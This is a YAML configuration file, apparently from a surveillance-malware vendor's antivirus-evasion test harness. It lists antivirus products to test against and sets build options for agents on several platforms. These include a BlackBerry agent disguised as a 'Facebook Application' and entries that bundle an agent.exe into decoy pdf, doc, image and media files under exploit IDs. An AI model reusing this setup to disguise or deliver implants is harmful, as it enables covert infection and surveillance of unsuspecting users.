hackedteam/test-av2

View on GitHub
AVAgent/default.yaml

Summary

Maintainability
Test Coverage

soldierlist: [adaware,iobit32,bitdef,comodo,fsecure,gdata,drweb,360cn,360cn5,kis32,avg,avg32]
blacklist: [emsisoft,sophos]

crop_whitelist: [kis,kis32]

backend: 192.168.100.201
frontend: 172.20.100.204

nointernetcheck: [zanzara.local, win7zenoav, win7-noav, paradox, avtagent, funff, funie, funch, funwin81]
operation: RiteAV

build_parameters:
        linux:
          platform_type: desktop
          binary: {admin: false, demo: false}
          melt: {}
          platform: linux
          package: {}
        osx:
          platform_type: desktop
          binary: {admin: true, demo: false}
          melt: {}
          platform: osx
          package: {}
        windows:
          platform_type: desktop
          binary: {admin: false, demo: false}
          melt: {admin: false, bit64: true, codec: true, scout: true}
          platform: windows
          meltfile: AVAgent/assets/windows/meltapp.exe
          sign: {}
          package: {}
        windows_elite:
          platform_type: desktop
          binary: {admin: false, demo: false}
          melt: {admin: false, bit64: true, codec: true, scout: false}
          platform: windows
          meltfile: AVAgent/assets/windows/meltapp.exe
          sign: {}
          package: {}
        windows_soldier:
          platform_type: desktop
          binary: {admin: false, demo: false}
          melt: {admin: false, bit64: true, codec: true, scout: false, soldier: true}
          platform: windows
          meltfile: AVAgent/assets/windows/meltapp.exe
          sign: {}
          package: {}
        winphone:
          platform_type: desktop
          binary: {admin: true, demo: false}
          melt: {}
          platform: winphone
          package: {}
        android:
          platform_type: mobile
          binary: {admin: false, demo: false}
          melt: {}
          platform: android
          sign: {}
          package: {}
        blackberry:
          platform_type: mobile
          binary: {demo: false}
          melt: {appname: facebook, desc: Applicazione utilissima di social network, name: Facebook
              Application, vendor: face inc, version: 1.2.3}
          package: {type: local}
          platform: blackberry
        ios:
          platform_type: mobile
          binary: {demo: false}
          melt: {}
          platform: ios
          package: {type: local}
        exploit:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.txt
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: txt, filename: example.txt, input: '000'}
          platform: exploit
          package: {}
        exploit_pdf:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.pdf
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: pdf, filename: example.pdf, input: '000'}
          platform: exploit
          package: {}
        exploit_rtf:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.rtf
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: rtf, filename: example.rtf, input: '000'}
          platform: exploit
          package: {}
        exploit_doc:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.doc
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: doc, filename: example.doc, input: '000'}
          platform: exploit
          package: {}
        exploit_ppt:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.ppt
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: ppt, filename: example.ppt, input: '000'}
          platform: exploit
          package: {}
        exploit_docx:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.docx
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: docx, filename: example.docx, input: '000'}
          platform: exploit
          package: {}
        exploit_ppsx:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.ppsx
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: ppsx, filename: example.ppsx, input: '000'}
          platform: exploit
          package: {}
        exploit_xls:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.xls
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: xls, filename: example.xls, input: '000'}
          platform: exploit
          package: {}
        exploit_rar:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.rar
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: rar, filename: example.rar, input: '000'}
          platform: exploit
          package: {}
        exploit_zip:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.zip
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: zip, filename: example.zip, input: '000'}
          platform: exploit
          package: {}
        exploit_exe:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltapp.exe
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: exe, filename: example.exe, input: '000'}
          platform: exploit
          package: {}
        exploit_avi:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.avi
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: avi, filename: example.avi, input: '000'}
          platform: exploit
          package: {}
        exploit_bmp:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.bmp
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: bmp, filename: example.bmp, input: '000'}
          platform: exploit
          package: {}
        exploit_eml:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.eml
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: eml, filename: example.eml, input: '000'}
          platform: exploit
          package: {}
        exploit_gif:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.gif
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: gif, filename: example.gif, input: '000'}
          platform: exploit
          package: {}
        exploit_html:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.html
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: html, filename: example.html, input: '000'}
          platform: exploit
          package: {}
        exploit_jpg:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.jpg
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: jpg, filename: example.jpg, input: '000'}
          platform: exploit
          package: {}
        exploit_mp3:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.mp3
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: mp3, filename: example.mp3, input: '000'}
          platform: exploit
          package: {}
        exploit_png:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.png
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: png, filename: example.png, input: '000'}
          platform: exploit
          package: {}
        exploit_vsd:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.vsd
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2012-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: vsd, filename: example.vsd, input: '000'}
          platform: exploit
          package: {}
        selfdel_exploit:
          platform_type: desktop
          deliver: {user: USERID}
          factory: {_id: '000'}
          meltfile: AVAgent/assets/windows/meltexploit.txt
          generate:
            binary: {admin: false, demo: false}
            exploit: HT-2014-001
            melt: {admin: false, demo: false, scout: true}
            platforms: [windows]
          melt: {appname: agent.exe, combo: txt, filename: example.txt, input: '000'}
          platform: exploit
          package: {}